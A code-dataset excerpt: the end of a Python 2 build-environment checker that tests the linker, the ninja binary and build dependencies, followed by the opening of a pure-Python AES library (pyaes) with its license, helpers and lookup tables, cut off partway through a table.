if e.errno == 22:
continue # Not a symlink
raise
if '/usr/local/gold' in target:
return ("%s is a symlink into /usr/local/gold.\n"
"It's difficult to make a recommendation, because you\n"
"probably set this up yourself. But you should make\n"
"/usr/bin/ld be the standard linker, which you likely\n"
"renamed /usr/bin/ld.bfd or something like that.\n" % path)
return None
@Check("random ninja binaries are not in the $PATH")
def CheckPathNinja():
proc = subprocess.Popen(['which', 'ninja'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if not 'depot_tools' in stdout:
return ("The ninja binary in your path isn't from depot_tools:\n"
+ " " + stdout +
"Remove custom ninjas from your path so that the one\n"
"in depot_tools is used.\n")
return None
@Check("build dependencies are satisfied")
def CheckBuildDeps():
script_path = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'build',
'install-build-deps.sh')
proc = subprocess.Popen([script_path, '--quick-check'],
stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if 'WARNING' in stdout:
return ("Your build dependencies are out-of-date.\n"
"Run '" + script_path + "' to update.")
return None
def RunChecks():
    """Run every registered check, printing ok/FAIL plus the fix advice."""
    for name, check in all_checks:
        sys.stdout.write("* Checking %s: " % name)
        sys.stdout.flush()
        # A check returns None on success, or an advice string on failure.
        error = check()
        if not error:
            print "ok"
        else:
            print "FAIL"
            print error


if __name__ == '__main__':
    RunChecks()
| bsd-3-clause |
mrquim/repository.mrquim | plugin.video.live.magellan/pyaesnew/aes.py | 177 | 60310 | # The MIT License (MIT)
#
# Copyright (c) 2014 Richard Moore
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# This is a pure-Python implementation of the AES algorithm and AES common
# modes of operation.
# See: https://en.wikipedia.org/wiki/Advanced_Encryption_Standard
# Honestly, the best description of the modes of operations are the wonderful
# diagrams on Wikipedia. They explain in moments what my words could never
# achieve. Hence the inline documentation here is sparer than I'd prefer.
# See: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation
# Also useful, PyCrypto, a crypto library implemented in C with Python bindings:
# https://www.dlitz.net/software/pycrypto/
# Supported key sizes:
# 128-bit
# 192-bit
# 256-bit
# Supported modes of operation:
# ECB - Electronic Codebook
# CBC - Cipher-Block Chaining
# CFB - Cipher Feedback
# OFB - Output Feedback
# CTR - Counter
# See the README.md for API details and general information.
import copy
import struct
__all__ = ["AES", "AESModeOfOperationCTR", "AESModeOfOperationCBC", "AESModeOfOperationCFB",
"AESModeOfOperationECB", "AESModeOfOperationOFB", "AESModesOfOperation", "Counter"]
def _compact_word(word):
return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
def _string_to_bytes(text):
return list(ord(c) for c in text)
def _bytes_to_string(binary):
return "".join(chr(b) for b in binary)
def _concat_list(a, b):
    # Python 2: plain + works for list+list (and str+str) concatenation.
    return a + b
# Python 3 compatibility
try:
    xrange
except Exception:
    # NameError on Python 3: xrange is gone and the str/bytes model
    # changed, so rebind the helpers above with Python 3 semantics.
    xrange = range

    # Python 3 supports bytes, which is already an array of integers
    def _string_to_bytes(text):
        if isinstance(text, bytes):
            return text
        return [ord(c) for c in text]

    # In Python 3, we return bytes
    def _bytes_to_string(binary):
        return bytes(binary)

    # Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first
    def _concat_list(a, b):
        return a + bytes(b)
# Based *largely* on the Rijndael implementation
# See: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
class AES(object):
'''Encapsulates the AES block cipher.
You generally should not need this. Use the AESModeOfOperation classes
below instead.'''
# Number of rounds by keysize
number_of_rounds = {16: 10, 24: 12, 32: 14}
# Round constant words
rcon = [ 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91 ]
# S-box and Inverse S-box (S is for Substitution)
S = [ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 ]
Si =[ 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d ]
# Transformations for encryption
T1 = [ 0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5, 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d, 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f, 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e, 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb, 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce, 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497, 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c, 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed, 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b, 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a, 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16, 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594, 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81, 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3, 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a, 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504, 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163, 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d, 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f, 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739, 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47, 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395, 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f, 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883, 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c, 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76, 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e, 0x924949db, 0x0c06060a, 
0x4824246c, 0xb85c5ce4, 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6, 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b, 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7, 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0, 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25, 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818, 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72, 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651, 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21, 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85, 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa, 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12, 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0, 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9, 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133, 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7, 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920, 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a, 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17, 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8, 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11, 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a ]
T2 = [ 0xa5c66363, 0x84f87c7c, 0x99ee7777, 0x8df67b7b, 0x0dfff2f2, 0xbdd66b6b, 0xb1de6f6f, 0x5491c5c5, 0x50603030, 0x03020101, 0xa9ce6767, 0x7d562b2b, 0x19e7fefe, 0x62b5d7d7, 0xe64dabab, 0x9aec7676, 0x458fcaca, 0x9d1f8282, 0x4089c9c9, 0x87fa7d7d, 0x15effafa, 0xebb25959, 0xc98e4747, 0x0bfbf0f0, 0xec41adad, 0x67b3d4d4, 0xfd5fa2a2, 0xea45afaf, 0xbf239c9c, 0xf753a4a4, 0x96e47272, 0x5b9bc0c0, 0xc275b7b7, 0x1ce1fdfd, 0xae3d9393, 0x6a4c2626, 0x5a6c3636, 0x417e3f3f, 0x02f5f7f7, 0x4f83cccc, 0x5c683434, 0xf451a5a5, 0x34d1e5e5, 0x08f9f1f1, 0x93e27171, 0x73abd8d8, 0x53623131, 0x3f2a1515, 0x0c080404, 0x5295c7c7, 0x65462323, 0x5e9dc3c3, 0x28301818, 0xa1379696, 0x0f0a0505, 0xb52f9a9a, 0x090e0707, 0x36241212, 0x9b1b8080, 0x3ddfe2e2, 0x26cdebeb, 0x694e2727, 0xcd7fb2b2, 0x9fea7575, 0x1b120909, 0x9e1d8383, 0x74582c2c, 0x2e341a1a, 0x2d361b1b, 0xb2dc6e6e, 0xeeb45a5a, 0xfb5ba0a0, 0xf6a45252, 0x4d763b3b, 0x61b7d6d6, 0xce7db3b3, 0x7b522929, 0x3edde3e3, 0x715e2f2f, 0x97138484, 0xf5a65353, 0x68b9d1d1, 0x00000000, 0x2cc1eded, 0x60402020, 0x1fe3fcfc, 0xc879b1b1, 0xedb65b5b, 0xbed46a6a, 0x468dcbcb, 0xd967bebe, 0x4b723939, 0xde944a4a, 0xd4984c4c, 0xe8b05858, 0x4a85cfcf, 0x6bbbd0d0, 0x2ac5efef, 0xe54faaaa, 0x16edfbfb, 0xc5864343, 0xd79a4d4d, 0x55663333, 0x94118585, 0xcf8a4545, 0x10e9f9f9, 0x06040202, 0x81fe7f7f, 0xf0a05050, 0x44783c3c, 0xba259f9f, 0xe34ba8a8, 0xf3a25151, 0xfe5da3a3, 0xc0804040, 0x8a058f8f, 0xad3f9292, 0xbc219d9d, 0x48703838, 0x04f1f5f5, 0xdf63bcbc, 0xc177b6b6, 0x75afdada, 0x63422121, 0x30201010, 0x1ae5ffff, 0x0efdf3f3, 0x6dbfd2d2, 0x4c81cdcd, 0x14180c0c, 0x35261313, 0x2fc3ecec, 0xe1be5f5f, 0xa2359797, 0xcc884444, 0x392e1717, 0x5793c4c4, 0xf255a7a7, 0x82fc7e7e, 0x477a3d3d, 0xacc86464, 0xe7ba5d5d, 0x2b321919, 0x95e67373, 0xa0c06060, 0x98198181, 0xd19e4f4f, 0x7fa3dcdc, 0x66442222, 0x7e542a2a, 0xab3b9090, 0x830b8888, 0xca8c4646, 0x29c7eeee, 0xd36bb8b8, 0x3c281414, 0x79a7dede, 0xe2bc5e5e, 0x1d160b0b, 0x76addbdb, 0x3bdbe0e0, 0x56643232, 0x4e743a3a, 0x1e140a0a, 0xdb924949, 0x0a0c0606, 
0x6c482424, 0xe4b85c5c, 0x5d9fc2c2, 0x6ebdd3d3, 0xef43acac, 0xa6c46262, 0xa8399191, 0xa4319595, 0x37d3e4e4, 0x8bf27979, 0x32d5e7e7, 0x438bc8c8, 0x596e3737, 0xb7da6d6d, 0x8c018d8d, 0x64b1d5d5, 0xd29c4e4e, 0xe049a9a9, 0xb4d86c6c, 0xfaac5656, 0x07f3f4f4, 0x25cfeaea, 0xafca6565, 0x8ef47a7a, 0xe947aeae, 0x18100808, 0xd56fbaba, 0x88f07878, 0x6f4a2525, 0x725c2e2e, 0x24381c1c, 0xf157a6a6, 0xc773b4b4, 0x5197c6c6, 0x23cbe8e8, 0x7ca1dddd, 0x9ce87474, 0x213e1f1f, 0xdd964b4b, 0xdc61bdbd, 0x860d8b8b, 0x850f8a8a, 0x90e07070, 0x427c3e3e, 0xc471b5b5, 0xaacc6666, 0xd8904848, 0x05060303, 0x01f7f6f6, 0x121c0e0e, 0xa3c26161, 0x5f6a3535, 0xf9ae5757, 0xd069b9b9, 0x91178686, 0x5899c1c1, 0x273a1d1d, 0xb9279e9e, 0x38d9e1e1, 0x13ebf8f8, 0xb32b9898, 0x33221111, 0xbbd26969, 0x70a9d9d9, 0x89078e8e, 0xa7339494, 0xb62d9b9b, 0x223c1e1e, 0x92158787, 0x20c9e9e9, 0x4987cece, 0xffaa5555, 0x78502828, 0x7aa5dfdf, 0x8f038c8c, 0xf859a1a1, 0x80098989, 0x171a0d0d, 0xda65bfbf, 0x31d7e6e6, 0xc6844242, 0xb8d06868, 0xc3824141, 0xb0299999, 0x775a2d2d, 0x111e0f0f, 0xcb7bb0b0, 0xfca85454, 0xd66dbbbb, 0x3a2c1616 ]
T3 = [ 0x63a5c663, 0x7c84f87c, 0x7799ee77, 0x7b8df67b, 0xf20dfff2, 0x6bbdd66b, 0x6fb1de6f, 0xc55491c5, 0x30506030, 0x01030201, 0x67a9ce67, 0x2b7d562b, 0xfe19e7fe, 0xd762b5d7, 0xabe64dab, 0x769aec76, 0xca458fca, 0x829d1f82, 0xc94089c9, 0x7d87fa7d, 0xfa15effa, 0x59ebb259, 0x47c98e47, 0xf00bfbf0, 0xadec41ad, 0xd467b3d4, 0xa2fd5fa2, 0xafea45af, 0x9cbf239c, 0xa4f753a4, 0x7296e472, 0xc05b9bc0, 0xb7c275b7, 0xfd1ce1fd, 0x93ae3d93, 0x266a4c26, 0x365a6c36, 0x3f417e3f, 0xf702f5f7, 0xcc4f83cc, 0x345c6834, 0xa5f451a5, 0xe534d1e5, 0xf108f9f1, 0x7193e271, 0xd873abd8, 0x31536231, 0x153f2a15, 0x040c0804, 0xc75295c7, 0x23654623, 0xc35e9dc3, 0x18283018, 0x96a13796, 0x050f0a05, 0x9ab52f9a, 0x07090e07, 0x12362412, 0x809b1b80, 0xe23ddfe2, 0xeb26cdeb, 0x27694e27, 0xb2cd7fb2, 0x759fea75, 0x091b1209, 0x839e1d83, 0x2c74582c, 0x1a2e341a, 0x1b2d361b, 0x6eb2dc6e, 0x5aeeb45a, 0xa0fb5ba0, 0x52f6a452, 0x3b4d763b, 0xd661b7d6, 0xb3ce7db3, 0x297b5229, 0xe33edde3, 0x2f715e2f, 0x84971384, 0x53f5a653, 0xd168b9d1, 0x00000000, 0xed2cc1ed, 0x20604020, 0xfc1fe3fc, 0xb1c879b1, 0x5bedb65b, 0x6abed46a, 0xcb468dcb, 0xbed967be, 0x394b7239, 0x4ade944a, 0x4cd4984c, 0x58e8b058, 0xcf4a85cf, 0xd06bbbd0, 0xef2ac5ef, 0xaae54faa, 0xfb16edfb, 0x43c58643, 0x4dd79a4d, 0x33556633, 0x85941185, 0x45cf8a45, 0xf910e9f9, 0x02060402, 0x7f81fe7f, 0x50f0a050, 0x3c44783c, 0x9fba259f, 0xa8e34ba8, 0x51f3a251, 0xa3fe5da3, 0x40c08040, 0x8f8a058f, 0x92ad3f92, 0x9dbc219d, 0x38487038, 0xf504f1f5, 0xbcdf63bc, 0xb6c177b6, 0xda75afda, 0x21634221, 0x10302010, 0xff1ae5ff, 0xf30efdf3, 0xd26dbfd2, 0xcd4c81cd, 0x0c14180c, 0x13352613, 0xec2fc3ec, 0x5fe1be5f, 0x97a23597, 0x44cc8844, 0x17392e17, 0xc45793c4, 0xa7f255a7, 0x7e82fc7e, 0x3d477a3d, 0x64acc864, 0x5de7ba5d, 0x192b3219, 0x7395e673, 0x60a0c060, 0x81981981, 0x4fd19e4f, 0xdc7fa3dc, 0x22664422, 0x2a7e542a, 0x90ab3b90, 0x88830b88, 0x46ca8c46, 0xee29c7ee, 0xb8d36bb8, 0x143c2814, 0xde79a7de, 0x5ee2bc5e, 0x0b1d160b, 0xdb76addb, 0xe03bdbe0, 0x32566432, 0x3a4e743a, 0x0a1e140a, 0x49db9249, 0x060a0c06, 
0x246c4824, 0x5ce4b85c, 0xc25d9fc2, 0xd36ebdd3, 0xacef43ac, 0x62a6c462, 0x91a83991, 0x95a43195, 0xe437d3e4, 0x798bf279, 0xe732d5e7, 0xc8438bc8, 0x37596e37, 0x6db7da6d, 0x8d8c018d, 0xd564b1d5, 0x4ed29c4e, 0xa9e049a9, 0x6cb4d86c, 0x56faac56, 0xf407f3f4, 0xea25cfea, 0x65afca65, 0x7a8ef47a, 0xaee947ae, 0x08181008, 0xbad56fba, 0x7888f078, 0x256f4a25, 0x2e725c2e, 0x1c24381c, 0xa6f157a6, 0xb4c773b4, 0xc65197c6, 0xe823cbe8, 0xdd7ca1dd, 0x749ce874, 0x1f213e1f, 0x4bdd964b, 0xbddc61bd, 0x8b860d8b, 0x8a850f8a, 0x7090e070, 0x3e427c3e, 0xb5c471b5, 0x66aacc66, 0x48d89048, 0x03050603, 0xf601f7f6, 0x0e121c0e, 0x61a3c261, 0x355f6a35, 0x57f9ae57, 0xb9d069b9, 0x86911786, 0xc15899c1, 0x1d273a1d, 0x9eb9279e, 0xe138d9e1, 0xf813ebf8, 0x98b32b98, 0x11332211, 0x69bbd269, 0xd970a9d9, 0x8e89078e, 0x94a73394, 0x9bb62d9b, 0x1e223c1e, 0x87921587, 0xe920c9e9, 0xce4987ce, 0x55ffaa55, 0x28785028, 0xdf7aa5df, 0x8c8f038c, 0xa1f859a1, 0x89800989, 0x0d171a0d, 0xbfda65bf, 0xe631d7e6, 0x42c68442, 0x68b8d068, 0x41c38241, 0x99b02999, 0x2d775a2d, 0x0f111e0f, 0xb0cb7bb0, 0x54fca854, 0xbbd66dbb, 0x163a2c16 ]
T4 = [ 0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x01010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x04040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x05050f0a, 0x9a9ab52f, 0x0707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x09091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x00000000, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x02020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0x0c0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0x0b0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0x0a0a1e14, 0x4949db92, 0x06060a0c, 
0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x08081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x03030506, 0xf6f601f7, 0x0e0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 